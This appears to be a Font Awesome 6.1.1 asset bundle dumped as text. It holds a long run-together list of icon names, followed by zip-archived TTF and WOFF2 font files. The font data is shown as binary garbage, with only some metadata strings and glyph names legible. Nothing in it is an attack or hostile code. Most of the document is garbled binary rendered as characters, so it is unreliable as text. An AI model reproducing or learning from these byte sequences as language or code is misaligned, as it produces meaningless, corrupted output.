wheat-awnwheelchair-move bowl-riceperson-pregnant house-chimney house-crack house-medical cent-signperson-through-window plant-wilt plus-minussailboatsectionshrimpbrazilian-real-sign chart-simple diagram-nextdiagram-predecessordiagram-successor earth-oceania bug-slashfile-circle-checkfile-circle-xmark shop-lock virus-covidvirus-covid-slashanchor-circle-checkanchor-circle-exclamationanchor-circle-xmark anchor-lockarrow-down-up-across-linearrow-down-up-lockarrow-right-to-cityarrow-up-from-ground-waterarrow-up-from-water-pumparrow-up-right-dotsarrows-down-to-linearrows-down-to-peoplearrows-left-right-to-line arrows-spinarrows-split-up-and-leftarrows-to-circle arrows-to-dot arrows-to-eyearrows-turn-rightarrows-turn-to-dotsarrows-up-to-line bore-holebottle-droplet bottle-water bowl-food boxes-packingbridgebridge-circle-checkbridge-circle-exclamationbridge-circle-xmark bridge-lock bridge-waterbucketbugsbuilding-circle-arrow-rightbuilding-circle-checkbuilding-circle-exclamationbuilding-circle-xmark building-flag building-lock building-ngobuilding-shield building-un building-userbuilding-wheatburstcar-on car-tunnel child-riflechildren circle-nodesclipboard-questioncloud-showers-watercomputer cubes-stackedenvelope-circle-check explosionferryfile-circle-exclamationfile-circle-minusfile-circle-plusfile-circle-question file-shield fire-burner fish-fins flask-vial glass-waterglass-water-dropletgroup-arrows-rotatehand-holding-hand handcuffs hands-boundhands-holding-childhands-holding-circleheart-circle-boltheart-circle-checkheart-circle-exclamationheart-circle-minusheart-circle-plusheart-circle-xmarkhelicopter-symbol helmet-unhill-avalanchehill-rockslidehouse-circle-checkhouse-circle-exclamationhouse-circle-xmark house-fire house-flaghouse-flood-water$house-flood-water-circle-arrow-right house-lockhouse-medical-circle-check house-medical-circle-exclamationhouse-medical-circle-xmarkhouse-medical-flag house-tsunamijar jar-wheatjet-fighter-up jug-detergent kitchen-set land-mine-on landmark-flag laptop-file lines-leaninglocation-pin-locklocustmagnifying-glass-arrow-rightmagnifying-glass-chartmars-and-venus-burstmask-ventilatormattress-pillow mobile-retromoney-bill-transfermoney-bill-trend-upmoney-bill-wheatmosquito mosquito-netmound mountain-city mountain-sunoil-well people-group people-linepeople-pullingpeople-robbery people-roofperson-arrow-down-to-lineperson-arrow-up-from-lineperson-breastfeeding person-burst person-caneperson-chalkboardperson-circle-checkperson-circle-exclamationperson-circle-minusperson-circle-plusperson-circle-questionperson-circle-xmarkperson-dress-burstperson-drowningperson-fallingperson-falling-burstperson-half-dressperson-harassingperson-military-pointingperson-military-rifleperson-military-to-person person-rays person-rifleperson-shelterperson-walking-arrow-loop-leftperson-walking-arrow-right&person-walking-dashed-line-arrow-rightperson-walking-luggageplane-circle-checkplane-circle-exclamationplane-circle-xmark plane-lock plate-wheatplug-circle-boltplug-circle-checkplug-circle-exclamationplug-circle-minusplug-circle-plusplug-circle-xmark ranking-star road-barrier road-bridgeroad-circle-checkroad-circle-exclamationroad-circle-xmark road-lock road-spikesrug sack-xmarkschool-circle-checkschool-circle-exclamationschool-circle-xmark school-flag school-lock sheet-plastic shield-cat shield-dog shield-heart square-nfisquare-person-confined square-virusstaff-aesculapiussun-plant-wilttarp tarp-droplettenttent-arrow-down-to-linetent-arrow-left-righttent-arrow-turn-lefttent-arrows-downtentstoilet-portabletoilets-portable tower-celltower-observation tree-citytrowel trowel-brickstruck-arrow-right truck-droplet truck-fieldtruck-field-un truck-planeusers-between-lines users-line users-raysusers-rectangleusers-viewfindervial-circle-check vial-viruswheat-awn-circle-exclamationworm xmarks-lines child-dresschild-reachingmartini-glass-emptymusicmagnifying-glassheartstaruserfilmtable-cells-large table-cells table-listcheckxmarkmagnifying-glass-plusmagnifying-glass-minus power-offsignalgearhouseclockroaddownloadinboxarrow-rotate-right arrows-rotaterectangle-listlockflag headphones volume-off volume-low volume-highqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalic text-height text-width align-left align-center align-right align-justifylistoutdentindentvideoimage location-pincircle-half-strokedroplet pen-to-squarearrows-up-down-left-right backward-step backward-fastbackwardplaypausestopforward forward-fast forward-stepeject chevron-left chevron-right circle-plus circle-minus circle-xmark circle-checkcircle-question circle-info crosshairsban arrow-left arrow-rightarrow-up arrow-downshareexpandcompressminuscircle-exclamationgiftleaffireeye eye-slashtriangle-exclamationplane calendar-daysshufflecommentmagnet chevron-up chevron-downretweet cart-shoppingfolder folder-openarrows-up-downarrows-left-right chart-bar camera-retrokeygearscomments star-halfarrow-right-from-bracket thumbtackarrow-up-right-from-squarearrow-right-to-brackettrophyuploadlemonphone square-phoneunlock credit-cardrss hard-drivebullhorn certificatehand-point-righthand-point-left hand-point-uphand-point-downcircle-arrow-leftcircle-arrow-rightcircle-arrow-upcircle-arrow-downglobewrench list-checkfilter briefcaseup-down-left-rightuserslinkcloudflaskscissorscopy paperclip floppy-disksquarebarslist-ullist-ol strikethrough underlinetable wand-magictruck money-bill caret-downcaret-up caret-left caret-right table-columnssort sort-downsort-upenvelopearrow-rotate-leftgavelboltsitemapumbrellapaste lightbulbarrow-right-arrow-leftcloud-arrow-downcloud-arrow-up user-doctor stethoscopesuitcasebell mug-saucerhospital truck-medicalsuitcase-medical jet-fighterbeer-mug-emptysquare-h square-plus angles-left angles-right angles-up angles-down angle-left angle-rightangle-up angle-downlaptop tablet-button mobile-button quote-left quote-rightspinnercircle face-smile face-frownface-mehgamepadkeyboardflag-checkeredterminalcode reply-alllocation-arrowcrop code-branch link-slashinfo superscript subscripteraser puzzle-piece microphonemicrophone-slashshieldcalendarfire-extinguisherrocketcircle-chevron-leftcircle-chevron-rightcircle-chevron-upcircle-chevron-downanchorunlock-keyholebullseyeellipsisellipsis-vertical square-rss circle-playticket square-minus arrow-turn-uparrow-turn-down square-check square-pensquare-arrow-up-rightshare-from-squarecompasssquare-caret-downsquare-caret-upsquare-caret-right euro-sign sterling-sign rupee-signyen-sign ruble-signwon-signfile file-linesarrow-down-a-z arrow-up-a-zarrow-down-wide-shortarrow-up-wide-shortarrow-down-1-9 arrow-up-1-9 thumbs-up thumbs-downarrow-down-long arrow-up-longarrow-left-longarrow-right-long person-dresspersonsunmoon box-archivebugsquare-caret-left circle-dot wheelchair lira-sign shuttle-spacesquare-envelopebuilding-columnsgraduation-caplanguagefaxbuildingchildpawcubecubesrecyclecartaxitreedatabasefile-pdf file-word file-excelfile-powerpoint file-image file-zipper file-audio file-video file-code life-ring circle-notch paper-planeclock-rotate-leftheading paragraphsliders share-nodessquare-share-nodesbombfutboltty binocularsplug newspaperwifi calculator bell-slashtrash copyright eye-dropper paintbrush cake-candles chart-area chart-pie chart-line toggle-off toggle-onbicyclebusclosed-captioning shekel-sign cart-pluscart-arrow-downdiamondship user-secret motorcycle street-view heart-pulsevenusmarsmercurymars-and-venus transgender venus-double mars-double venus-mars mars-strokemars-stroke-upmars-stroke-rightneuter genderlessserver user-plus user-xmarkbedtrain train-subway battery-fullbattery-three-quarters battery-halfbattery-quarter battery-empty arrow-pointeri-cursor object-groupobject-ungroup note-stickyclonescale-balancedhourglass-starthourglass-empty hourglass-end hourglasshand-back-fisthand hand-scissors hand-lizard hand-spock hand-pointer hand-peace trademark registeredtv calendar-pluscalendar-minuscalendar-xmarkcalendar-checkindustrymap-pin signs-postmapmessage circle-pause circle-stop bag-shoppingbasket-shoppinguniversal-accessperson-walking-with-caneaudio-description phone-volumebraille ear-listenhands-asl-interpretingear-deafhandseye-low-vision font-awesome handshake envelope-open address-book address-card circle-userid-badgeid-cardtemperature-fulltemperature-three-quarterstemperature-halftemperature-quartertemperature-emptyshowerbathpodcastwindow-maximizewindow-minimizewindow-restore square-xmark microchip snowflakespoonutensils rotate-left trash-canrotate stopwatchright-from-bracketright-to-bracket rotate-rightpooimagespencilpenpen-clip down-long left-long right-longup-longfile-penmaximize clipboard left-rightup-down circle-down circle-left circle-right circle-upup-right-from-squaresquare-up-right right-leftrepeat code-commit code-mergedesktopgem turn-downturn-up lock-open location-dotmicrophone-linesmobile-screen-buttonmobile mobile-screen money-bill-1 phone-slashimage-portraitreply shield-halvedtablet-screen-buttontablet ticket-simple user-largerectangle-xmark down-left-and-up-right-to-center"up-right-and-down-left-from-centerbaseball-bat-ballbaseball basketball bowling-ballchess chess-bishop chess-board chess-king chess-knight chess-pawn chess-queen chess-rookdumbbellfootball golf-ball-tee hockey-puck broom-ball square-fulltable-tennis-paddle-ball volleyball hand-dotsbandagebox boxes-stackedbriefcase-medicalfire-flame-simplecapsulesclipboard-checkclipboard-listperson-dots-from-linednadolly cart-flatbed file-medical file-waveform kit-medicalcircle-h id-card-clip notes-medicalpalletpillsprescription-bottleprescription-bottle-medical bed-pulse truck-fastsmokingsyringetablets thermometervialvials warehouse weight-scalex-raybox-open comment-dots comment-slashcouchcircle-dollar-to-slotdove hand-holdinghand-holding-hearthand-holding-dollarhand-holding-droplet hands-holdinghandshake-anglehandshake-simple parachute-boxpeople-carry-box piggy-bankribbonrouteseedling sign-hangingface-smile-winktapetruck-ramp-box truck-moving video-slash wine-glassuser-large-slashuser-astronaut user-check user-clock user-gearuser-pen user-group user-graduate user-lock user-minus user-ninja user-shield user-slashuser-taguser-tie users-gearscale-unbalancedscale-unbalanced-flipblender book-opentower-broadcastbroom chalkboardchalkboard-userchurchcoins compact-disccrowcrowndice dice-five dice-fourdice-onedice-six dice-threedice-twodivide door-closed door-openfeatherfroggas-pumpglassesgreater-than-equal helicopterinfinity kiwi-birdless-than-equalmemorymicrophone-lines-slashmoney-bill-wavemoney-bill-1-wave money-checkmoney-check-dollar not-equalpalettesquare-parkingdiagram-projectreceiptrobotrulerruler-combinedruler-horizontalruler-verticalschool screwdriver shoe-printsskull ban-smokingstoreshopbars-staggered stroopwafeltoolboxshirtperson-walkingwallet face-angryarchway book-atlasaward delete-left bezier-curvebongbrush bus-simplecannabis check-doublemartini-glass-citrusbell-conciergecookie cookie-bite crop-simpletachograph-digital face-dizzycompass-draftingdrum drum-steelpanfeather-pointed file-contractfile-arrow-down file-export file-import file-invoicefile-invoice-dollarfile-prescriptionfile-signature file-arrow-upfill fill-drip fingerprintfish face-flushedface-frown-open martini-glass earth-africaearth-americas earth-asia face-grimace face-grinface-grin-wideface-grin-beamface-grin-beam-sweatface-grin-heartsface-grin-squintface-grin-squint-tearsface-grin-starsface-grin-tearsface-grin-tongueface-grin-tongue-squintface-grin-tongue-winkface-grin-winkgrip grip-verticalheadphones-simpleheadset highlighterhot-tub-personhoteljoint face-kissface-kiss-beamface-kiss-wink-heart face-laughface-laugh-beamface-laugh-squintface-laugh-winkcart-flatbed-suitcase map-locationmap-location-dotmarkermedalface-meh-blankface-rolling-eyesmonument mortar-pestle paint-rollerpassport pen-fancypen-nib pen-ruler plane-arrivalplane-departure prescription face-sad-cry face-sad-tear van-shuttle signatureface-smile-beam solar-panelspasplotch spray-canstampstar-half-strokesuitcase-rolling face-surprise swatchbookperson-swimming water-ladder droplet-slash face-tiredtoothumbrella-beach vector-squareweight-hangingwine-glass-emptyspray-can-sparkles apple-wholeatombonebook-open-readerbraincar-rear car-battery car-burstcar-sidecharging-stationdiamond-turn-right draw-polygon laptop-code layer-grouplocation-crosshairslungs microscopeoil-canpoopshapes star-of-lifegauge gauge-high gauge-simplegauge-simple-highteeth teeth-open masks-theater traffic-light truck-monster truck-pickup rectangle-adankh book-bible business-timecitycomment-dollarcomments-dollarcross dharmachakraenvelope-open-text folder-minus folder-plusfilter-circle-dollargopuramhamsabahaijedibook-journal-whillskaabakhandalandmarkenvelopes-bulkmenorahmosqueomspaghetti-monster-flyingpeaceplace-of-worshipsquare-poll-verticalsquare-poll-horizontalperson-praying hands-praying book-quranmagnifying-glass-dollarmagnifying-glass-locationsockssquare-root-variablestar-and-crescent star-of-david synagogue scroll-torah torii-gatevihara volume-xmarkyin-yang blender-phone book-skull campgroundcatchair cloud-moon cloud-suncowdice-d20dice-d6dogdragondrumstick-bitedungeonfile-csv hand-fistghosthammerhanukiah hat-wizard person-hikinghippohorsehouse-chimney-crack hryvnia-signmaskmountain network-wiredotterringperson-runningscrollskull-crossbonesslashspider toilet-papertractor user-injured vr-cardboard wand-sparkleswind wine-bottlecloud-meatballcloud-moon-rain cloud-raincloud-showers-heavycloud-sun-raindemocratflag-usa hurricane landmark-domemeteor person-booth poo-stormrainbow republicansmogtemperature-hightemperature-low cloud-bolttornadovolcano check-to-slotwaterbaby baby-carriage biohazardblog calendar-day calendar-week candy-canecarrot cash-registerminimizedumpster dumpster-fireethernetgiftschampagne-glasses whiskey-glass earth-europe grip-linesgrip-lines-verticalguitar heart-crack holly-berry horse-headiciclesigloomittenmug-hot radiationcircle-radiationrestroom satellitesatellite-dishsd-cardsim-cardperson-skating person-skiingperson-skiing-nordicsleigh comment-smsperson-snowboardingsnowmansnowplow tenge-signtoiletscrewdriver-wrench train-tramfire-flame-curvedbacon book-medical bread-slicecheesehouse-chimney-medicalclipboard-usercomment-medicalcrutchdiseaseegg folder-treeburgerhand-middle-finger helmet-safety hospital-userhotdog ice-creamlaptop-medicalpager pepper-hot pizza-slice sack-dollar bars-progresstrash-arrow-uptrash-can-arrow-up user-nurse wave-square person-biking border-all border-noneborder-top-leftperson-diggingfanicons phone-flipsquare-phone-flip photo-film text-slasharrow-down-z-a arrow-up-z-aarrow-down-short-widearrow-up-short-widearrow-down-9-1 arrow-up-9-1 spell-check voicemail hat-cowboyhat-cowboy-sidecomputer-mouseradio record-vinyl walkie-talkiecaravanPK!ty<)<)#assets/fonts/fa-v4compatibility.ttfnu[  OS/2OwP(`cmapP,,glyfeg}Hhead!^p6hhea*$hmtxJlocaXTmaxp2 name.!}post#&tmYC_< __@@))~LfGLfAWSMAz@9 @@@@@@@@@B@AGf~ #>ILV^acxPRzAGe} #>HLV^`cuPRz}{zq`_\?:-& , >HXz:Z ^6 @ 2 h  . \ , @$ $!"3!27654'&#'7'3#7` @  ZZZZ&ZZ&ZZ @  zL: :-&'1&'1&'6767#"'1767167&'&'('66RR66''  3!87;;-R6666R-;;78! L%#"'&'5#3#"/&76735##"/&54?635#&'&?632#35676P  `( H G '_  PP  _' G H (a  P H(`  PP  `(H H (`  PP  `( H 67"'&#"3676/7654/#32?7675&' N  N O  N N  N N  N 57#32?327675&'73676/7654/&#"'&׈ N  N Q N  NN  N   N  N "7#"/&76735#&'&?632#3h g 88 h h 88 8pp    pp    ?@"%'&=#/&54?635476p  pp  ph 88 h h 78 h /CWk21!2#!&'&'476321#"'&=47631#"'&=47632721#"'&=47631#"'&=47632   p"      @        "P @ @ `   ` `   &B327654'&+"'&5476;27654'&+%'&#";?654'`@ @ @ @))       )) H @ G  %>%"1!327654'&+!676754'&##32?7675&' ` `  h * ) `  ` @) * B%'&#";?654'7#";2+";6767&'&'Y   G@ @ @ @))ш H @ H      )))%7#5476735"'&#"#335Y (7! QQd]<O =F]Wf%11&'&'&'676767%76?6?6754/&'#"/&'&?676/&?6/"#1%65&'1"":9HH9:"""":9HH9:"": 9 ,"  G55| H9:"""":9HH9:"""":9H@ ( '    ('@%  28-051!&'&'56767!#351!&'&'56767!!5!  `    `   @  @ @  @  @ @ F%#&'&?'+&'5676327''&'5673017'&7673/76 HG  GG  GG HHEG  GG  GG GH  .3Le632#"/&54?6312#"/&5477'?632#"/&547?632#"/&547&&''##}"ii:9999a8998&&&& ##}-ii:99998899@*2:AHZ76733#&'6735&'%1!&'&'6767!&'1&'3'67167#53#516767&'&'0@@@@@@0  00  0D0@@@@ 00  00 ,GYk}%11&'&'&'676767%"1327654'&#67167&'76'&"1&11"1327654'&#271654'&#"3%"1327654'&#"":9HH9:"""":9HH9:""  ? @p  0  @  H9:"""":9HH9:"""":9H    0     @   5!?654/&!"3!5&'&7675!27654'&# @  pp     pp  @  H h h H I h h H  &+!!6767&'&'"'1&547632#7!!@  @   `@p&+#36767&'&'"'1&547632##30p  p   @(+/'&?'&76?672'&?'&/z o o DD[i Vv 6% n II n   8x U l/3!&'&'56767356767'&'&'&#()=,""  "0=)(%   "0@"##"'&5476;67'&'&?632>H"p pH h h . "    pp @"%#"/&7673&'#"'&5476;3:h h Hp p"H 8pp    "  .!!6767&'&'/#"/&54?'&76;@5 -D  D- @ -D  D, @F47163!2+32+/&76732767#"'&5476;&'&+"'&51  8$ $ !!.  P   P     ,f     #@Z^312?6'4'&#4'&#"'&#"33674'&+76'&'#"3'&#"76?37676/7#h  W     X3J  3J  P  P X  }  `  #. # `vI I      * @%8Kn%327654'&+"3327654'&+"3327654'&+"3#";27654'&#%4'&#"'&#"32?6'4'&#@` _            X  W           U#. # ` `  @%8Kn%#";27654'&##";27654'&##";27654'&##";27654'&#4'&#"'&#"32?6'4'&#_ _             X  W            #. # ` `  ">Gf7"4'&#"'&'"32?6'4'32767676'&'&'7&'675&'&3;27654'&'   X  W      "%%"   @  #. #  ` ` w  #%% i`  /    %#"/&7673476323h h I  H 8pp  @   ##"'&5#&'&?632H  I h h .  @  pp ?@%1#!/&54?6!2   pp  @  H h h I ?@%'&=!"'&567!5676p  @  ph I H h P2176763676756763#"'&='&'&76?5'&'&76?547631` w  w  @4$$  66N`   )  )  #" '" '""5  N33     6 '2=H67332#!"'&5476;7!!&'&'675&'3675&'3675&' x `  `hP`a   n@P!%'&#!"32?6/#7'3'#7'!h g   }?MNN~KA~V c__RccR__3=G47163!2#2#!"'&5476356?'&'5"'&57675#35&/ @ .DD.  .DD. `DDDD  B/DD/B   B/DD/B  (DD( 'DD' 3<G21#2#!"'&5476356?'&'5"'&54763!36=#3&/1` .DD.  .DD. @DD  B/DD/B   B/DD/B   DD$4DT11367673676767&'&'&'"'1&5476323"'1&5476323"'1&547632G:9""7 2#$2:G:9"""":9H     //:L7'/.:://   %+%2"u ,2 ^ 4 J  V J d% D X . :S Version 769.01171875 (Font Awesome version: 6.1.1)The web's most popular icon set and toolkit.https://fontawesome.comFontAwesomev4Compatibility-RegularFont Awesome v4 CompatibilityRegularCopyright (c) Font AwesomeFont Awesome v4 Compatibility RegularFont Awesome v4 Compatibility Regular-6.1.1Version 769.01171875 (Font Awesome version: 6.1.1)The web's most popular icon set and toolkit.https://fontawesome.comFontAwesomev4Compatibility-RegularFont Awesome v4 CompatibilityRegularCopyright (c) Font AwesomeFont Awesome v4 Compatibility RegularFont Awesome v4 Compatibility Regular-6.1.1)      !"#$%&'() location-dotup-down-left-right"up-right-and-down-left-from-center down-left-and-up-right-to-centerup-down left-right chart-columnright-from-bracketup-right-from-squareright-to-bracket facebook-fearth-americas bars-progressmaximizewand-magic-sparkles money-bill-1 gauge-high right-lefttablet-screen-buttonmobile-screen-buttonstar-half-strokeunlockturn-up turn-downsquare-up-rightindian-rupee-signarrow-down-z-aarrow-down-short-widearrow-down-wide-shortarrow-down-9-1 down-longup-long left-long right-longturkish-lira-sign trash-cangemhourglass-empty hourglass comment-dotsPK!LL assets/fonts/fa-brands-400.woff2nu[wOF2L 8$ `PHʊˏT  WQgV?HIU:1~?翿 ~>>bEx,ץ"#$eq$ʳ0G[DQ=34m* RsXQ\ ;wpmo8ﯶ sQ?E`^w;lnWes8vPn\G] ڭ7Z0]v=6;`W=Z ^}@+uyo|T^t/.8=οC:>9z_xh=)ZmL2ê0ˠng٠}^<^xsɶL%!UܷYL&k6QS&awE* IBuJG7h׶7\md F%ӑQp4)NJ΀dAoՋNʹ*躞S{YnKt e>C F+\q1F0]7m2t`\A^x9 ;~߶_]ul&uzv3<2cߟ9/_x9X(NFvbL;ѽ6vsiFmnI4 crr嘠w]E |zhv KR|~T:ŘOIwt{]{!䮎3_̥֥ϰ3dgew}V_M>8m<$=²;2Gȱ/oG=[ږd䋋G~Es@T:G99v_ǭj>ha&k73AAy,K-CzAtA-5[nM?uUS@7EYnMv Q阅Xu؈-8GxD|efbvgYgf#vaw*FA9~tNi:[R]tzY-w>gIjw?Ig)cʙƦikڛ&ę6]a؝v=aO+}dZXg9A "<\9Mt|-wqw]rwKEVn adROm~K,;̟W(00#10 ? 7` .!3532s,˱ !{r0qqWp%Ro.[%XLG 3cD34rڬ7[!s\4W̶ s<0o{e{y?/~_M<矗4yo䓿;o?L;M\/܃'s{=7w//vm}n:ƩʯE|"hoWK}>.*,2" C/t@{C[AC4@}"TG5"FI"@qAAD"agLx Oo~,bqrm+ܠsM,r (B((C(&EujPZ@ԦuG}Jh@C@w9[GW^ADvG!i4 B .XŪWEYrDP+URfe s ѽ:[?ݖz[ iپヘ3ڻ?~]H!),R *ބrU[ȷ+'kLb6%I nXsmK>I)=s`++‰M׶;Ii;r=Sn18jbt}!]lcjոs*VEY4KH4'VvO1vVky´]v^|4_vqvAإ0c~Φe@,ҲBbG )=l6}q\Sh̾\ *$NݓИ8mIYJkZ,B1 Cږ;H :CI3]ǒLֶL;Ϩ-ZZ :V3=rRz$v$"'R<eQY%z;VP_ˀ+]mum{'D"Wͮک#ƚTf(QZz*cz%K&l.Aqxs:">6L٦Uf~r˒/Uv{|d)Ll 4obaCXnd4g& KԽ{إ&ޏBɋ?;:}'zK|U\Yc;NG>)cXwQ%OL*~cRzŕ{#]j%A>Tq^l%g,MQxOsO[^4GI^[c^mwZ$k$GmXmˣ.`rӷ!pZ'*r\,*@^*u5&Xj4ɷ*4f^*b+dpô]n?A8{@}\.;[ahׂUĎ{_W ^_9p CnN&H窾5HJЙW\C̑f8mu Pf;w@m\ 4vNuxݞZffℎCMS̚\֛Ws.tݡ5g~V7Pp߻PŅ=ߛ `0.1fs[Xc!~_"quG]C׹8ƶK5^Qf6_Oy3tp]1pTʼñ]0 <}EPXv 0_b25 ]wlx.?[Px?n~Kmϖ6`&`[+_RV}r])uO|v]ig|-ޱp}kBK9oo7f9kui&{w:kLu1!=/gVB9v|/Cf6Ci:9{p?8*9%A=6: Ci(4\. UdJTtq2@'ܻbfi9:sZTQdi6빡ZC@E\\o6MWW:lilضIu4HAn%:<}ǩ00C]t8l%1Ca1`kkBGl7i2X:cviGd vtYv{`G2K${2O5Q:Cvz$=H&eʜ峤Lq*H,r(I+QkUfi^Лt+&O ȳ]׭ 0< ]ص-vFۨ/tv߇mZ-G=v xE"bJ5 ۍ<Ano?ss>koWr oo}4Ol~ OƏ|x>l6;ǷK I4d &t2bΦ2KIn|C:Eേu-ƶߵDg$ih5u]~!`lc!7ol0z v~˚ Y;- 4#=W)'*E(7}m%,t~^=ԩq> ˆՕmJ KAPm6*8X L}յ&^Et\hZQU'xtb{<҈D{"_GYALl6B"5ˢ_ _q~.pwƎ;_3d`3yxƓ v;3 aaЍ4Ka dzx~wXs]7\s{;;CeGm;Qܬxsu,PjZ"ͩ,J?Ƃ~F2VaSG-U~wb]+ -ӴlC5Tvdi֙q<1aY+%"׵Ua-ez6jZVŶ*n.0 e;ZQ\sMQ}ivl=I\4+G:M%omݐ NWkϖı8lRBp٦ÅQM񾰮ێDd6M ɧ)jQʈ,ELgϒ,%"%|\rʕ+Wr-WWʕ+W~ïfg?uٳgϞ]8{Y"F̓_?+фFYpEQ=eQ]fAfMt77nyh6g i:G]כ<}:]ښulUrqQ޾u40tO5yxL9ZcR^f5%ND[l'(=J#* .EY*UN3 <`bfW,Ӵ/j+|R,s- bYqkQ:Jk4Bʼnm^ rӱÚޭ6ҷ_S +[\תqdzBDd<BK`x)'f,1OXGfe4+H2#&YꣿOG?I\dP).T%wQ$xA AőLƱ\y+eDX"oa&0QP*$/roaˬ(d:r:ٽ[(2l6?f"qg: !]q^&b:(Iˬ(!8Q犹R(WdfJWP*X$E=Ne" c _ &q` L*i@<=M L]Ef0MI30c}MG2ƌ`00>S`$nRSs6M[H,iBH!tw!iu ޜY<:7M[%SZ.LcҲ\ux]Z^/v4!u0Mu]Ru瑩ivZ4MhV50&)]./KEW S]_e[9.74LapJE>7g)l-`{4$3kVQ*6E %NHȑZVqnN0{3sۇVl+b[٭Cpm狡TZM4z<ʏ!rͷ_}/~+W~%i2t+0giYeQ[Φ3i.\H38ƣd Efe?>;~o' #Th_Rb /qfzlr{`R @uhܒh:U0yTI]lGctf{ޒVkI]#C:Bc|/ (@J Ub1֋U3ҩWdmvHXZ[(jԛ(un'fD՚m5١NNtT6UD,#h\Yobt\Y)|L$HpOP$wycpJp^^v '㡝큿aoao&` o3iDe;L4 B0)(U,M Ufד:w0X9㨸؝b;~<ߓ'vwwww$' 3>~]DRyi DeBO1֞OO#uFFrأlڟObZmͿתVڭjʱoTsR,hڪPE>] ҳfz?}ܭtk_D؁1TYёD-ǵCX=M39sP^S>1{ #֘iO´=3Mx8c{&tScѶDžnlm]vtozlG?|Ùi?3L/røoA6 mЌ ²1xĬy]m;mY얮R5tފe"y6M0 -L@\Ź)-NNg6 @ݢ8U⾥XGzNLq q~dr~Opvձs;aڬש \pLM cR234M3JY ~&tǎDA(E>(z,=LH\\e&j,+_+cniaj 5Q2&F,\q6U%..ki,ba ڋAU.|m,xnۮOӞgVv;Vv;>q]G@-l6kUT8WF]C"(?`4|&|Q&fIP &=oNI'N_=WQg#4XM0G0W=67̆7-%+Aeqi'*eݮ/P\6pO6!biZ3cQ{Ԣ2:~9ҍ:~߃:ڲL74CV/ߌG+MQDkҐ/5;g"Ҥ|S" yUE1KXeņ)rtWg6,I*(ESII&"Z]tXmu.sqǺ;9~<܌aw|>WJmt!w=nϟ[uߨw: mQ!1z֒gRD8V8,ȋ(ѿwQj\)rmM;v`A1/\ޛ&m>'cA{'Ih4|F7F߬p$yDd)ڠiLDǪ6|p]tjE9:XȆe.ʬT( eс!X[ae;X]o;$՛ޤzຏ?J9j kpmYs?YUe4O=v` |DZpzC?Wlo$&?FBxY}M',Y4LQ'm>p౛Gn,&BesAk>+ҵd,'Ѽ,E4.Hgɲly}䃲ȋ`QEQ- MML['O4v>+6$K) 4*lP=:vA jWHNk XDF؃;溇>3HH) J*ytRYm1 02a(z0, ^<$"ب@Ν-{aKԑ0Fe~ ~I-fV☋ c=Ϡ{%q6s6OeU8Rnç $z%DnhیqJinpYf!~Q)rʀ!zY><$(܈c¢ņJΞ3gVm@`9ݦtr q'?yǝ!rP=98ed?jQ'=O9@a?lS9= i2"PL.C]aggPmW^ 9wpeԏj[}lNJ_~?{j;nfcjTO98Gmk?yέmˢGnolҶ(]n,IrO^M>@H2eAeeufuP%,xe5(USF.jZ)tL%d dD6f=$ b~PSCm ^Ih0X[^[R k'I_fCu׉cש>UJ[ZK8 E!7>B!pnYQ(ƈqZAjA뭮mmu;L( B ܇J \r5nZ mznǶ; "+sۇqSbrmDwx8Φՠ,ʴ*ҬMrY "KfEv@ǽ;^_OpΜx}fj^Gx| !}~:Y'>T>џVE`MYRbȄ"9"  _̀p$tMs7? hu%߯O|im9ǗKkˁˎ/fcLoOasv,!DrCȷOOtt &,!6ל&,Ɠ84T~|堜ϦI,Ke5JQ,MJQ2Ke-dWV;K|@c1-ч4mK<זZa V"n`sϢ@@)@qHdMɣ ;:gmg2Pk!Pk l-AP s!|IUs~s`sZxr"@"D  u٣YFY8 g$~COg A:w/ȅd%p~_|p\w-e$ nSFhw6;î.Hq!- .Pjhcw]̶7: G sz.?W]e| .D,, ;;'Nc'N<0 ;v^e!+×u]ݑ$,y(rX)r6 yɽUaH J^olz/S+pa4LS!,KOt L3;}-N{;jhNNTVnb6/ -L,-IX$4&!m"geZ'\ jx'lWpO8NIWOmeq09aG8E&)$hܞOڴ燥6a貑a#Ojr4NjWU!֥z>ͅ,KOL ,1% CYdK1YJ+ȶJ(|]xŋ/ҥtbd߭ SZDL2JdBiB"r՛%Qo %6xgv_G.|9[~NgG^^S߭diYDdŬg@ VzeBRʖ \\;fi&/+Q ^\e1x}`#M/X̙5nu{o f 6 "Z4cfem8 "# REmWun;m~ _fn|b(/6kئPfCv<``0߽ \/T~|LK "=*P Zmr!+.Ak爛FmJj*)UVjiAJd"/s O(7H=u!y7NĈ-f5P40Z\2IbP nX׻Y3׻Ӷ{ S!oxIӶ 'Ln}~NzZ-"?VQT*qYm@, WmGcLMBp^lWfGQhM!LKucF>]:L[DT#xF;G8ocVq-G p+yRFRmԃJX"kR5]cZmd0 ;L,[ F?k!!`?NIG5Z%@͒YQ>|+ο ??h6Kȥ)oC?1iS4 Y ]?D^TՑrm96Lm[omyJ|Mf\j.Y7%^y=|{G7*}ax-HT $񤐃$MgrZMt2],B'"IgQQNҀ5w&(Vʳ#!Fy(I L4Q-6E9+RYQU9&r(Yc}1#`ZO i++'n|4׽Tȑ6'tc4Mj@cdOOA3UQA99TG\~; d(/dn{8qgqV}vGןҋl8*eZڀz X2 :NS~(!TVl-rVzO扩S˭/;GPU>nǟb~%2R-}okߋ=?\(9~-{,sddcӭ2_;7BE/R$ Ij7-paijŤ6G|;,Ë֗y+ g3䜙MNfL'k~7i~}xzVNssiRgq"8V $-qV+N:$vZ L&w #>|B`E\SDYTtui5D*xH4( Qqv[WER^7rJ2Yud^729p2Cf[[ORu h8(\[v1nw{aKډe4I_ ` q(F1[w;g{fc6oBkڷ Z vl}=Yǿqj[MQ^tVj3ʬvPjFfz h9b @t[XV*z@fa~VVO ޳zjv8SWW]n;uΜ?rn+JjÝӧn!p~Mrg]3]2Ԓ2$kI<|Mrgv=۞6vIahO`AuԘ-{ }*rmSgpr ݞi8ZGQ8\$[MF!BF[YQtQǮJS #)Hx |?\!IT$b"d_Q_Hц~\Y>϶>rȿ]KvsO۟QNvA\*:U+ M‚n2Q{V$cYK<ˤQ䌴8驵oغt, &x։͞_(op=l䑜r'yy5y mGp2t9|rycy5Av|c rb@ǎ8vbj۱mW{y'-^pHr-D _G>DH.+>ϦɾٴZƓiK! kcr*J~H i}/^ Kв|ػ}gkDF@~Lh0 #РhrC ԏ@} ӋeB7fӣ1|c~Dy@;_]`um}ew7wC(weU~+HATe~ԯ2޽XV hiY9?͵++˕Ҭ[l?Vu݉&3o4$#MB"Y晜EP?4y%g3;=|=v~E2~}uvl6?ON@vi 